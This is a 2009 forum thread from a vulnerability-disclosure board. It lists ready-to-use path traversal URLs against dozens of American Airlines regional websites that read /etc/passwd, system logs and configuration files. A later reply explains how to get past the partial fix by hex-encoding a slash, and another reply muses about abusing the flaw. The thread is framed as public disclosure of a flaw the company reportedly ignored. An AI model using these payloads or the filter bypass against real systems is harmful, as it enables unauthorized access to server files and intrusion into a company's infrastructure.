Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
american airlines local file inclide
Posted by: RonPaul
Date: May 18, 2009 06:00PM

http://www.aa.com.do/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.aa.com.pe/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.be/aa/i18nForward.do?locale=en_GB&p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.ch/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.cl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.cn/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.co.cr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.co.uk/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.de/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.fr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.ie/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.in/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.it/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.jp/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.american-airlines.nl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.aa.com.ve/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.americanairlines.com.au/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.americanairlines.com.ru/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.flagshiplounge.net/aa/i18nForward.do?locale=en_GB&p=
http://www.premiumcustomerservices.net/aa/i18nForward.do?locale=en_GB&p=
http://www.touraa.com/aa/i18nForward.do?p=

and some senstive files i found

https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/wtmpx
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/logadm.conf
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/messages
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/lib/newsyslog
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/sbin/logadm
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/lastlog
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/netconfig
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/syslog.conf
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/system
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/hosts





its been reported and they dont feel like responding



Edited 1 time(s). Last edit at 07/16/2009 06:11AM by RonPaul.

Options: ReplyQuote
Re: american airlines local file inclide
Posted by: mort
Date: May 23, 2009 08:36PM

So it's fixed for literal "." in the URL, returns a 403 that says "no .. allowed in URL".

Happily takes hex still, just sub the very first "/" for "%2f" and leave the rest.

Options: ReplyQuote
Re: american airlines local file inclide
Posted by: PaPPy
Date: May 23, 2009 09:26PM

sometimes just taking off a ../ does it too

i wonder how long people have been abusing this, maybe getting free flights?

anyone find anything good?

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: american airlines local file inclide
Posted by: RonPaul
Date: September 11, 2009 07:21AM

what a shock, still not fixed

Options: ReplyQuote


Sorry, only registered users may post in this forum.